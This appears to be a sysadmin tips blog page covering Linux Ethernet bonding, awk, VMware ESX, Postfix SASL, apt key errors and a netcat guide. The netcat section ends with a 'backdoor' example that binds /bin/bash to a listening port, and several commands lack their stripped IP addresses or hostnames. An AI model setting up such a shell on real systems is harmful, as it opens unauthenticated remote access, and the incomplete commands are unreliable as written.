Linux Ethernet Bonding

Bonding allows you to aggregate multiple ports into a single group, effectively combining the bandwidth into a single connection. Bonding also allows you to create multi-gigabit pipes to transport traffic through the highest traffic areas of your network. For example, you can aggregate three megabits ports (1 mb each) into a three-megabits trunk port. That is equivalent with having one interface with three megabits speed.
You can use it wherever you need redundant links, fault tolerance or load balancing networks. It is the best way to have a high availability network segment. A very useful way to use bonding is to use it in connection with 802.1q VLAN support (your network equipment must have 802.1q protocol implemented).

In order to configure Ethernet bonding, the kernel must have support for bonding:

# modprobe --list | grep bonding


Then :

# modprobe bonding mode=0 miimon=50 # load bonding module # ifconfig eth0 down # putting down the eth0 interface # ifconfig eth1 down # putting down the eth1 interface # ifconfig bond0 hw ether 00:12:34:56:78:90 # changing the MAC address of the bond0 interface # ifconfig bond0 up # to set ethX interfaces as slave the bond0 must have an ip. # ifenslave bond0 eth0 eth1 # putting the eth0 and eth1 interface in the slave mod for bond0

Now you can configuration by entering this command :

# cat /proc/net/bonding/bond0

Ethernet Channel Bonding Driver: v3.2.5 (March 21, 2008)

Bonding Mode: load balancing (round-robin)
MII Status: up
MII Polling Interval (ms): 50
Up Delay (ms): 0
Down Delay (ms): 0

Slave Interface: eth0
MII Status: up
Link Failure Count: 1
Permanent HW addr: 08:00:27:d7:a8:cb

Slave Interface: eth1
MII Status: up
Link Failure Count: 1
Permanent HW addr: 08:00:27:a9:e3:bf

You can set up your bond interface according to your needs. Changing one parameters (mode=X) you can have the following bonding types:
mode=0 (balance-rr)
Round-robin policy: Transmit packets in sequential order from the first available slave through the last. This mode provides load balancing and fault tolerance.

mode=1 (active-backup)
Active-backup policy: Only one slave in the bond is active. A different slave becomes active if, and only if, the active slave fails. The bond’s MAC address is externally visible on only one port (network adapter) to avoid confusing the switch. This mode provides fault tolerance. The primary option affects the behavior of this mode.

mode=2 (balance-xor)
XOR policy: Transmit based on [(source MAC address XOR’d with destination MAC address) modulo slave count]. This selects the same slave for each destination MAC address. This mode provides load balancing and fault tolerance.

mode=3 (broadcast)
Broadcast policy: transmits everything on all slave interfaces. This mode provides fault tolerance.

mode=4 (802.3ad)
IEEE 802.3ad Dynamic link aggregation. Creates aggregation groups that share the same speed and duplex settings. Utilizes all slaves in the active aggregator according to the 802.3ad specification.

1. Ethtool support in the base drivers for retrieving
the speed and duplex of each slave.
2. A switch that supports IEEE 802.3ad Dynamic link
Most switches will require some type of configuration
to enable 802.3ad mode.

mode=5 (balance-tlb)
Adaptive transmit load balancing: channel bonding that does not require any special switch support. The outgoing traffic is distributed according to the current load (computed relative to the speed) on each slave. Incoming traffic is received by the current slave. If the receiving slave fails, another slave takes over the MAC address of the failed receiving slave.

Ethtool support in the base drivers for retrieving the
speed of each slave.

mode=6 (balance-alb)
Adaptive load balancing: includes balance-tlb plus receive load balancing (rlb) for IPV4 traffic, and does not require any special switch support. The receive load balancing is achieved by ARP negotiation. The bonding driver intercepts the ARP Replies sent by the local system on their way out and overwrites the source hardware address with the unique hardware address of one of the slaves in the bond such that different peers use different hardware addresses for the server.

The most used are the first four mode types…

For more information , refer to these pages :

Sum using awk

Sum a column of file sizes output from an ls command using awk:

# ls -l *.iso | awk '{ SUM += $5} END { print SUM/1024/1024 }'

the below command will show you amount of memory used by apache :

# ps -ylC httpd --sort:rss | awk '{ SUM += $8 } END { print SUM/1024 }'

VMware ESX, killing a virtual machine that won’t die !

Sometimes the Virtual Center won’t do the job. You virtual machine has hung and you need to kill it. Here are 2 examples of how you can kill the vm from within the service console:

1. The ‘VMWARE-CMD’ command

* Log on to the service console and issue the following command ‘vmware-cmd /vmfs/volumes///.vmx stop’ you must not use the friendly datastore name. If you need to know the location of all vm’s type ‘VMWARE-CMD -l’ that will list on vm’s and the location for the corresponding vmx file.
* If that fails, then try it with the hard option, ‘vmware-cmd /vmfs/volumes///.vmx stop hard’ this command will just try and kill it without shutting it down.

2. Kill it using the PID command

* Run the following command: ps auxfww | grep to locate the correct PID of the virtual machine, the first number to appear in the output is your vm’s PID. Use the PID number to terminate the process by issuing kill -9

SMTP Auth – Postfix and SASL (Debian)

# apt-get install sasl2-bin libsasl2 libsasl2-modules

Now edit /etc/default/saslauthd:


Now we should create /etc/postfix/sasl/smtpd.conf :

pwcheck_method: saslauthd
mech_list: PLAIN LOGIN

Ok, let’s add some lines in /etc/postfix/ to enable SASL:

smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options = noanonymous

smtpd_recipient_restrictions = permit_sasl_authenticated, permit_mynetworks, reject_unauth_destination

postfix does a chroot so it can’t communicate with saslauthd. This is the tricky part:

# rm -r /var/run/saslauthd/
# mkdir -p /var/spool/postfix/var/run/saslauthd
# ln -s /var/spool/postfix/var/run/saslauthd /var/run
# chgrp sasl /var/spool/postfix/var/run/saslauthd
# adduser postfix sasl 

Now restart postfix and start saslauthd

# invoke-rc.d postfix restart
# invoke-rc.d saslauthd start

apt-get complain “The following signatures couldn’t be verified because the public key is not available”

If you happen to upgrade using apt-get and get the following error:

# apt-get update
Fetched 18.7kB in 3s (5301B/s)
Reading package lists... Done
W: GPG error: stable/non-US Release: The following signatures couldn't be verified 
because the public key is not available: NO_PUBKEY F1D53D8C4F368D5D W: You may want to run apt-get update to correct these problems

It means that your APT doesn’t have needed the public key. In the example above, finger print of the public key is
F1D53D8C4F368D5D. To remedy the problem, you should do the following:

# gpg --keyserver --recv-keys F1D53D8C4F368D5D
gpg: requesting key 4F368D5D from hkp server
gpg: key 4F368D5D: public key "Debian Archive Automatic Signing Key (2005) " imported
gpg: no ultimately trusted keys found
gpg: Total number processed: 1
gpg: imported: 1

# gpg --armor --export F1D53D8C4F368D5D | apt-key add -

Have a nice hacking ;)

Netcat: The TCP/IP Swiss army knife

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

In this little guide I’ll quickly cover some very helpful usage’s of netcat .

Simple Chat:

The simplest example of netcat usage is to create a server-client chat system. In the following example it is assumed that the machine that creates the listening socket (server) has the IP address. So, create the chat server on this machine and set it to listen to 12345 TCP port:

# nc -lp 12345


# nc -l 12345

If you now connect to port 12345 on that host, everything you type will be sent to the other party, which leads us to using netcat as a chat server.
Connect to it from another machine by entering this command:

# nc 12345

Now both parties can chat!

Port Scanner:

Netcat can be a port scanner. It does not have as many features as say nmap, but if you just want to see what ports are open on a given machine, you can simply do:

# nc -vzw 1 localhost 1-1000

Transferring Files:

Let’s say you want to transfer a file from machine A to machine B . you can use netcat as a file transfer software.
On machine A do the following, where 12345 is some unused port on which you want to send the file:

# nc -lp 12345 < myfile.tar.bz2


# nc -l 12345 < myfile.tar.bz2

then go to the machine B and run this command: ( is machine A IP address)

# nc 12345 > myfile.tar.bz2

Aanother Examples:

# tar -czf - /etc/ | nc -lp 12345

and then:

 # nc 12345 > mybackup.tar.gz

Simple Single page Web Server:

# while true; do nc -lp 8080 -q 1 < test.html; done

now if you connect to http://YOUR-IP-ADDRESS:8080 , you will see contents of test.html page .

Netcat as a Backdoor !!!

netcat can be used as a backdoor! You can specify the shell (or for that matter any executable) you want netcat to run at a successful connection with the -e parameter:

# nc -lp 54321 -e /bin/bash

now if you connect to the port 54321 , you will have a shell :

Getting System Information

# while true; do nc -lp 12345 -e /usr/bin/uptime; done

The user who wants to obtain system information has to issue the following command:

# nc 12345